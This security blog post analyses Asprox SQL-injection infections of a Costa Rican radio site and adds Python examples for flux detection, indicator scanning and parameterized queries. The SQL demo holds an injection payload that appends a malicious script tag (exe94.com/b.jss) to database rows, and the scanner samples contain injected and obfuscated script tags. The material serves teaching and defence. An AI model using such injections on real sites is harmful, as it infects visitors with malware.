Radio Asproxing its way to Costa Rica's clients

In recent days it has come to our chapter's attention that Asprox has infected the website of a well-known Costa Rican radio broadcasting company.

The first infection appeared on June 14th, the day of the Costa Rica vs Grenada 2010 FIFA World Cup qualifier. The match was not televised, so the station's online radio stream was at peak demand, which led us to think the attack might have been targeted rather than a coincidence.

An SQL injection had planted a reference to the b.jss script on the exe94.com domain into the site's pages; that script redirected to datajto.com and then to adsitelo.com, which finally served the trojan as load.php. A notable technique in these attacks was the JavaScript obfuscation applied to the redirections and to the final execution.

After analyzing the trojan's infection, the files it modified turned out to be those of a German installation of Windows XP, so the targeted-attack hypothesis was wrong.

An email was sent to the company advising them to act against the infection, which they did by replacing the vulnerable dynamic query with static code.

Twenty days later, on July 4th, the same radio site was serving the new ngg.js script from three domains:

  • ucomddv.com
  • upcomd.com
  • adwadb.mobi

These scripts redirected through several sites and a CGI script that finally sent clients on to msn.com.

Both attacks used SQL injection and single-flux (fast-flux) DNS to spread: the A records of the malicious domains changed every 10 minutes while the authoritative name servers stayed constant over time.
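To make the single-flux observation concrete, here is an added example (not code from the original post) that classifies a series of DNS observations as stable, single-flux or double-flux from the A-record churn and whether the name servers move. The observations are constructed, the addresses and name servers are placeholders, and the thresholds are assumptions chosen for the sample, not published fast-flux criteria.

```python
from datetime import datetime, timedelta
from statistics import median

# Constructed observations for one malicious host name: (timestamp, A records,
# NS records) sampled every 10 minutes. Addresses are documentation ranges and
# the name servers are placeholders; nothing here is a real lookup.
BASE = datetime(2008, 7, 4, 12, 0)
FIXED_NS = ("ns1.example.net", "ns2.example.net")
OBSERVATIONS = [
    (BASE + timedelta(minutes=10 * i), a_records, FIXED_NS)
    for i, a_records in enumerate([
        ("198.51.100.10", "198.51.100.11"),
        ("203.0.113.5", "203.0.113.6"),
        ("192.0.2.77", "192.0.2.78"),
        ("198.51.100.12", "203.0.113.9"),
        ("192.0.2.80", "198.51.100.13"),
        ("203.0.113.14", "192.0.2.81"),
    ])
]


def classify_flux(observations, min_distinct_ips=8, min_churn=0.5):
    """Classify a time-ordered series of (timestamp, A records, NS records).

    Thresholds are assumptions for this sample: a name is 'fluxing' when the
    A record set changes in at least `min_churn` of consecutive samples and
    at least `min_distinct_ips` distinct addresses were seen. Fluxing with
    constant name servers is single-flux; with changing name servers it is
    double-flux.
    """
    if len(observations) < 2:
        raise ValueError("need at least two observations")
    a_sets = [frozenset(a) for _, a, _ in observations]
    ns_sets = {frozenset(ns) for _, _, ns in observations}
    distinct_ips = set().union(*a_sets)

    # Minutes between consecutive samples in which the A record set changed.
    change_intervals = []
    for (t0, _, _), (t1, _, _), s0, s1 in zip(
        observations, observations[1:], a_sets, a_sets[1:]
    ):
        if s0 != s1:
            change_intervals.append((t1 - t0).total_seconds() / 60)

    churn = len(change_intervals) / (len(observations) - 1)
    fluxing = churn >= min_churn and len(distinct_ips) >= min_distinct_ips
    if not fluxing:
        verdict = "stable"
    elif len(ns_sets) > 1:
        verdict = "double-flux"
    else:
        verdict = "single-flux"
    return {
        "distinct_ips": len(distinct_ips),
        "a_churn": churn,
        "median_change_interval_min": median(change_intervals) if change_intervals else None,
        "ns_changed": len(ns_sets) > 1,
        "verdict": verdict,
    }


if __name__ == "__main__":
    print(classify_flux(OBSERVATIONS))
```

In practice the observation list comes from a poller that resolves the name every few minutes and also queries its NS set; the distinction the function draws is the one the post describes, a rotating A set behind fixed authoritative servers.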

It is important to notice that the first round of attack was very straightforward in the domains it served: only one script domain appeared on the main page, and it hopped through two others to reach its final destination. The new one, however, served up to three domains on the vulnerable page, each of them led on to different domains, and not always the same domain on each visit. It also incorporated better browser-sensing logic.
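As an added example (not from the original post), the following scanner looks through stored page content for `<script src=...>` references to the domains and script names listed above for both waves, and expands one obfuscation pattern, a script tag hidden inside document.write(unescape('...')), which is assumed here rather than quoted from the post. The sample pages, the datajto.com path x.js and the cdn.example.com name are constructed.

```python
import re
from urllib.parse import unquote, urlsplit

# Indicators taken from the post: domains and script names seen in both waves.
IOC_DOMAINS = {"exe94.com", "datajto.com", "adsitelo.com",
               "ucomddv.com", "upcomd.com", "adwadb.mobi"}
IOC_SCRIPTS = {"b.jss", "ngg.js"}

SCRIPT_SRC = re.compile(r"<script[^>]*\ssrc\s*=\s*['\"]?([^'\"\s>]+)", re.I)
# The one obfuscation pattern handled here (an assumption, not a pattern the
# post quotes): a script tag hidden inside document.write(unescape('%3C...')).
UNESCAPE_CALL = re.compile(r"unescape\(\s*['\"]([^'\"]*)['\"]\s*\)", re.I)

# Constructed sample pages. Wave 1 carried a single script reference, wave 2
# three; the datajto.com path x.js and cdn.example.com are made up.
SAMPLE_PAGES = {
    "wave1": '<html><body><h1>Radio en vivo</h1>'
             '<script src=http://exe94.com/b.jss></script></body></html>',
    "wave2": '<div id="player"></div>'
             '<script src="http://ucomddv.com/ngg.js"></script>'
             '<script src="http://upcomd.com/ngg.js"></script>'
             '<script src="http://adwadb.mobi/ngg.js"></script>',
    "obfuscated": "<script>document.write(unescape("
                  "'%3Cscript src=%22http://datajto.com/x.js%22%3E%3C/script%3E'))</script>",
    "clean": '<script src="/js/player.js"></script>'
             '<script src="https://cdn.example.com/lib.js"></script>',
}


def deobfuscate(html):
    """Expand unescape('...') literals so hidden script tags become visible."""
    return UNESCAPE_CALL.sub(lambda m: unquote(m.group(1)), html)


def is_ioc_host(host):
    return any(host == d or host.endswith("." + d) for d in IOC_DOMAINS)


def find_injected_scripts(html):
    """Return one record per external script reference matching the indicators.

    Relative sources (no host) are ignored. A hit is reported when the host
    is a listed domain (or a subdomain of one) or the file name is one of
    the listed scripts, so a known script served from a new domain, which
    is what the second wave did, is still flagged.
    """
    hits = []
    for src in SCRIPT_SRC.findall(deobfuscate(html)):
        parts = urlsplit(src)
        host = parts.hostname
        if not host:
            continue
        filename = parts.path.rsplit("/", 1)[-1]
        reasons = []
        if is_ioc_host(host):
            reasons.append("domain")
        if filename in IOC_SCRIPTS:
            reasons.append("script")
        if reasons:
            hits.append({"host": host, "file": filename, "reason": "+".join(reasons)})
    return hits


def scan_pages(pages):
    """Scan a mapping of name -> HTML and keep only the pages with hits."""
    report = {}
    for name, html in pages.items():
        hits = find_injected_scripts(html)
        if hits:
            report[name] = hits
    return report


if __name__ == "__main__":
    for name, hits in scan_pages(SAMPLE_PAGES).items():
        print(name, hits)
```

Running the same function over the text columns of the database, rather than over rendered pages, finds the injected references at the source, since an SQL injection of this kind leaves them in the stored content and every page that renders those columns serves them.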

SQL injection attacks are widespread and aggressive right now, infecting sites all over the world, not just in developed countries. They take advantage of careless dynamic SQL in a great many ASP sites.
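To show the careless dynamic programming the post refers to next to its fix, here is an added example (not the station's code): a page hit counter written in the string-concatenation style of classic ASP beside a parameterized version, using Python and an in-memory SQLite database as a stand-in for ADO and SQL Server. The table, the rows and the stacked-statement payload are constructed; the payload only borrows the exe94.com/b.jss reference from the post and is not the real Asprox injection.

```python
import sqlite3

# Script reference from the post's first wave; used only as the string the
# injected statement appends, not as the real Asprox payload.
INJECTED_TAG = "<script src=http://exe94.com/b.jss></script>"

# A stacked-statement payload in the shape a request parameter would carry.
# Constructed for this example; the actual Asprox injection is not reproduced.
PAYLOAD = "1; UPDATE news SET body = body || '" + INJECTED_TAG + "'"


def make_db():
    """Constructed content table standing in for the radio site's database."""
    db = sqlite3.connect(":memory:")
    db.execute("CREATE TABLE news (id INTEGER PRIMARY KEY, title TEXT, "
               "body TEXT, hits INTEGER NOT NULL DEFAULT 0)")
    db.executemany("INSERT INTO news (id, title, body) VALUES (?, ?, ?)", [
        (1, "Costa Rica vs Grenada", "Listen to the match live at 19:00."),
        (2, "Schedule", "The morning show moves to 07:00."),
    ])
    db.commit()
    return db


def count_hit_vulnerable(db, raw_id):
    """Classic-ASP style: the request parameter is concatenated into the SQL.

    executescript stands in for ADO's Connection.Execute, which hands the
    whole string to SQL Server, so a '; ...' in the parameter runs as a
    second statement, here against every row of the table.
    """
    db.executescript("UPDATE news SET hits = hits + 1 WHERE id = " + raw_id)


def count_hit_safe(db, raw_id):
    """Parameterized version: the parameter is bound as a value, never parsed."""
    db.execute("UPDATE news SET hits = hits + 1 WHERE id = ?", (raw_id,))
    db.commit()


def hits(db):
    """Current hit counter per row, as {id: hits}."""
    return dict(db.execute("SELECT id, hits FROM news ORDER BY id"))


def injected_rows(db):
    """Ids of rows whose body now carries an external script tag."""
    return [row[0] for row in db.execute(
        "SELECT id FROM news WHERE body LIKE '%<script src=%' ORDER BY id")]


if __name__ == "__main__":
    db = make_db()
    count_hit_vulnerable(db, PAYLOAD)
    print("vulnerable:", injected_rows(db), hits(db))
    db = make_db()
    count_hit_safe(db, PAYLOAD)
    print("safe:", injected_rows(db), hits(db))
```

With the concatenated query the payload's second statement appends the script tag to the body of every row, which is how one injection can poison every page of a site; with the bound parameter the whole string is compared as a value, matches no id, and changes nothing.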

More information about this can be found on Dancho Danchev's excellent blog, and in case you are a victim of this disease, medication can be found here.